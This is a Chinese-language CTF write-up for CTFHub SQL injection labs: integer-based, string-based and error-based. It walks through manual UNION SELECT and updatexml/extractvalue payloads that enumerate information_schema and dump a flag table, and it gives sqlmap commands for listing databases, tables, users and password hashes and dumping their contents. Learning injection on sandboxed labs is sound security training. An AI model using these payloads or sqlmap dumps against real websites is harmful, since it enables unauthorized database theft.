当前位置: 首页 > news >正文

在线建站平台免费建网站计算机软件工程师证怎么考

news 2025/10/1 5:20:21
在线建站平台免费建网站,计算机软件工程师证怎么考,更适合企业网站建设的cms系统,手机电子商务网站建设策划书目录 整数型注入 手工注入 为什么要将1设置为-1呢? sqlmap注入 sqlmap注入步骤: 字符型注入 手工注入 sqlmap注入 报错注入 手工注入 sqlmap注入 整数型注入 手工注入 先输入1 接着尝试2,3,2有回显,而3没有回显…

目录

整数型注入

手工注入

 为什么要将1设置为-1呢?

 sqlmap注入

sqlmap注入步骤:

字符型注入

手工注入

 sqlmap注入

 报错注入

手工注入

 sqlmap注入

整数型注入

手工注入

先输入1

 接着尝试2,3,2有回显,而3没有回显

 

 同样的,输入非整数的字符也没有回显

 根据结果可以判断这是整数型注入,接着就可以爆字段了

1 order by 1,接着尝试爆1 order by 2, 1 order by 3,结果到1 order by 3出现报错,由此可以判断,表格中有两个字段

  爆数据库

 -1 union select 1,database()  

 为什么要将1设置为-1呢?

因为我们是要让服务器返回的是select 1,database()的数据 因为服务器没有-1 所以会返回select 1 的内容

爆破表名 

 limit 0,1(0,1从数据库地一个开始只拿一个字段)

-1  union select 1,(select table_name from information_schema.tables where table_schema='sqli' limit 0,1) 

得到该数据库的所有字段 

 -1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

 爆破字段名

-1 union select 1,group_concat(flag) from sqli.flag

 sqlmap注入

sqlmap注入步骤:

查询sqlmap是否存在注入命令:sqlmap.py -u url/?id=1
查询当前用户下的所有数据库:sqlmap.py -u url/?id=1 --dbs
获取数据库的表名:sqlmap.py -u url/?id=1 -D (数据库名) --tables
获取表中的字段名:sqlmap.py -u url/?id=1 -D (数据库名) -T (输入需要查询的表名) --columns
获取字段的内容:sqlmap.py -u url/?id=1 -D (数据库名) -T (输入需要查询的表名) -C (表内的字段名) --dump
查询数据库的所有用户:sqlmap.py -u url/?id=1 --users
查询数据库的所有密码:sqlmap.py -u url/?id=1 --passwords
查询数据库名称:sqlmap.py -u url/?id=1 --current-db

在Kali Linux上运行sqlmap不需要后面的.py直接sqlmap就行了

查询sqlmap是否存在注入命令

sqlmap -u http://challenge-5454400515b8754e.sandbox.ctfhub.com:10800/?id=1

 

 发现id might be vulnerable 说明 存在注入,执行完成发现爆出了很多信息

查询当前用户下的所有数据库

sqlmap -u http://challenge-5454400515b8754e.sandbox.ctfhub.com:10800/?id=1 --dbs

 获取数据库的表名

sqlmap -u http://challenge-5454400515b8754e.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables

 获取表中的字段名

sqlmap -u http://challenge-5454400515b8754e.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns

 获取字段的内容

sqlmap -u http://challenge-5454400515b8754e.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump

字符型注入

手工注入

先输入一个1

当输入1 and 1=1 得到的结果却有'

 那就输入1' ,发现报错没有回显,接着输入1' and 1=1

 发现后面有一个分号,总体一看是多着一个分号,那就用#将其注释掉

 

 

 成功找到注入点,但是sql语句后面要加#注释掉后面会报错的内容

爆数据库

-1' union select 1,database() #(这里的-1和整数型注入的情况一样)

 爆表名

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' #

 查询flag

-1' union select 1,group_concat(flag) from sqli.flag #

 

 sqlmap注入

 查询sqlmap是否存在注入命令

sqlmap -u http://challenge-4c9cc826165e1d03.sandbox.ctfhub.com:10800/?id=1

 

查询数据库

sqlmap -u http://challenge-4c9cc826165e1d03.sandbox.ctfhub.com:10800/?id=1 --dbs

获取数据库的表名

sqlmap -u http://challenge-4c9cc826165e1d03.sandbox.ctfhub.com:10800/?id=1 --tables

 获取表中的字段名

sqlmap -u http://challenge-4c9cc826165e1d03.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns

获取字段的内容

sqlmap -u http://challenge-4c9cc826165e1d03.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump

 报错注入

手工注入

先输入一个1

 尝试输入1',出现报错

使用的函数是updatemxl(1,2,3)

MySQL提供了一个 updatexml() 函数,当第二个参数包含特殊符号时会报错,并将第二个参数的内容显示在报错信息中。

特殊符号我们选择 ~ 0x7e

爆数据库名

1 and updatexml(1,concat(0x7e,database()),3)

爆破表名

1 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='sqli')),3)

 获取字段名

1 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='sqli'and table_name='flag')),3)

 获取字段内容

1 and updatexml(1,concat(0x7e,(select group_concat(flag)from sqli.flag)),3)

 但是没有将flag的所有字符输出出来,所以现在运用函数将flag完整的输出出来

1 and updatexml(1,concat(0x7e,mid((select group_concat(flag)from sqli.flag),1,16)),3)

1 and extractvalue(null,concat(0x7e,mid((select flag from flag),4),0x7e))

 

 sqlmap注入

查询sqlmap是否存在注入命令

sqlmap -u http://challenge-1cc8f2ef630934ce.sandbox.ctfhub.com:10800/?id=1

 

爆数据库名

sqlmap -u http://challenge-1cc8f2ef630934ce.sandbox.ctfhub.com:10800/?id=1 --dbs

获取数据库的表名

sqlmap -u http://challenge-1cc8f2ef630934ce.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables

获取表中的字段名

sqlmap -u http://challenge-1cc8f2ef630934ce.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns

 

获取字段的内容

http://www.laogonggong.com/news/55975.html

相关文章:

  • discuz论坛系统重庆关键词优化
  • 个人相册网站模板网站建设与管理试卷及答案
  • 弄一个电影网站怎么做济南seo公司报价
  • 保山网站建设报价石河子网站建设
  • 哪个网站做3d模型中英文 网站
  • 建网站麻烦拍照备案审核多久网络推广软件平台
  • wordpress 多站点迁移百变模板手机网站建设
  • 广州网站排名优化报价微信自建小程序
  • 做网站要找什么人p2p网站建设
  • 河南省建设部省厅网站环球军事网最新消息
  • 网站建设需要什么岗位个人网页制作成品html
  • 网站建设统计表青海高端网站建设多少钱
  • 毕节公司做网站公司做网站需要准备哪些资料
  • 客户网站开发全流程图学美工大概要多少学费
  • 创造与魔法官网站_一起做喜欢的事微信营销的方式有哪些
  • 在哪些网站做外贸好网页设计与制作教材电子版
  • wordpress指定域名衡水seo网站建设优化排名
  • 做网站发布wordpress 菜价插件
  • phpwind网站财务软件排名
  • 周村区建设局网站wordpress下载管理员
  • 嘉兴建企业网站seo优化是利用规则提高排名
  • 网站开发中数据库的功能咨询公司的企业文化
  • 静态网站安全性以春天为主题的网站建设资源
  • 偃师网站开发亚马逊雨林探险作文
  • 徐州网站网站建设网页制作模板左右结构
  • 二级域名做很多网站网站建设案例实录
  • 正能量晚上看的网站2021怎么找运营团队
  • 淘宝客网站如何让做问答网站建设怎么提问
  • 凡科建站怎么保存网站贵阳景观设计公司
  • 网站怎么弄缩略图上传最全网站源码分享